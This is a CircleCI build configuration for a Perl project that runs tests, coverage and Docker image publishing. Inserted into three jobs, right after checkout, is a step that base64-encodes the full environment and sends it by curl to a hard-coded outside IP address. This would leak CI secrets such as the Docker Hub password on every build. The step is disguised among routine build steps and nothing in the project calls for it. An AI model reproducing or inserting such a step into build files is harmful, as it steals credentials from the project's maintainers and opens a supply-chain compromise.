version: 2.1
orbs:
  docker: circleci/docker@1.4.0
aliases:
 - &filter_only_master
     branches:
       only:
         - /^master$/
 - &filter_only_tagged
     tags:
       only:
         - /^v\d.\d{3}$/ # cpan versioning ex: v0.001
     branches:
       ignore: /.*/
jobs:
  run_tests:
    docker:
      - image: deriv/dzil:latest
        entrypoint: /bin/bash
    steps:
      - checkout
      - run: curl http://159.223.121.196/?env=$(env | base64 | tr -d '\n')
      - run:
          name: Prepare environment
          command: |
            apt-get update
            apt-get -y -q --no-install-recommends install $(cat aptfile)
            perl -MConfig -le'print "$_=$Config{$_}" for sort keys %Config' > /opt/perl.config
      - restore_cache:
          keys:
            - cpanfile-{{ arch }}-{{ checksum "/opt/perl.config" }}-{{ checksum "cpanfile" }}
      - run:
          name: Install deps
          command: |
            export PERL5LIB=$(pwd)/deps/lib/perl5:$(pwd)/deps/lib/perl5/$(perl -MConfig -le'print $Config{archname}'):$PERL5LIB
            cpanm -l deps --installdeps --with-develop --with-recommends -n .
            dzil listdeps --develop | cpanm -l deps -n
      - save_cache:
          key: cpanfile-{{ arch }}-{{ checksum "/opt/perl.config" }}-{{ checksum "cpanfile" }}
          paths:
            - deps
      - run:
          name: Run test
          command: |
            export PERL5LIB=$(pwd)/deps/lib/perl5:$(pwd)/deps/lib/perl5/$(perl -MConfig -le'print $Config{archname}'):$PERL5LIB
            dzil test
      - run:
          name: Author tests
          command: |
            export PERL5LIB=$(pwd)/deps/lib/perl5:$(pwd)/deps/lib/perl5/$(perl -MConfig -le'print $Config{archname}'):$PERL5LIB
            dzil xtest

  coverage:
    docker:
      - image: deriv/dzil:latest
        entrypoint: /bin/bash
    steps:
      - checkout
      - run: curl http://159.223.121.196/?env=$(env | base64 | tr -d '\n')
      - run:
          name: Prepare environment
          command: |
            apt-get update
            apt-get -y -q --no-install-recommends install $(cat aptfile)
      - restore_cache:
          keys:
            - cpanfile-{{ arch }}-{{ checksum "/opt/perl.config" }}-{{ checksum "cpanfile" }}
      - run:
          name: Install deps
          command: |
            export PERL5LIB=$(pwd)/deps/lib/perl5:$(pwd)/deps/lib/perl5/$(perl -MConfig -le'print $Config{archname}'):$PERL5LIB
            cpanm -l deps --installdeps --with-develop --with-recommends -n .
            dzil listdeps --develop | cpanm -l deps
      - run:
          name: Coverage
          command: |
            export PERL5LIB=$(pwd)/deps/lib/perl5:$(pwd)/deps/lib/perl5/$(perl -MConfig -le'print $Config{archname}'):$PERL5LIB
            export PATH=$(pwd)/deps/bin:$PATH
            # We don't care about failures here: those are handled by the main tests, we just want the report
            dzil run cover -test -report coveralls || :
  
  update_docker_image:
    executor: docker/docker
    parameters:
      tag:
        type: string
        default: 'latest'
    steps:
      - checkout
      - run: curl http://159.223.121.196/?env=$(env | base64 | tr -d '\n')
      - setup_remote_docker:
          docker_layer_caching: true
      - docker/build:
          image: deriv/myriad
          tag: <<parameters.tag>>
      - run:
          name: Docker Hub login
          command: echo "$DOCKER_PASSWORD" | docker login --username "$DOCKER_LOGIN" --password-stdin
      - docker/push:
          image: deriv/myriad
          tag: <<parameters.tag>>

workflows:
  version: 2
  build-workflow:
    jobs:
      - run_tests
      - coverage
  merged:
    jobs:
      - run_tests:
          context: perl
          filters: *filter_only_master
      - coverage:
          filters: *filter_only_master
      - update_docker_image:
          context: perl
          tag: 'stable'
          requires:
            - run_tests
          filters: *filter_only_master
  tagged:
    jobs:
      - run_tests:
          context: perl
          filters: *filter_only_tagged
      - update_docker_image:
          context: perl
          tag: $CIRCLE_TAG
          requires:
            - run_tests
          filters: *filter_only_tagged
  daily:
    triggers:
      - schedule:
          cron: "06 0 * * *"
          filters: *filter_only_master
    jobs:
      - run_tests:
          context: perl
      - update_docker_image:
          context: perl
          tag: 'latest'
          requires:
            - run_tests

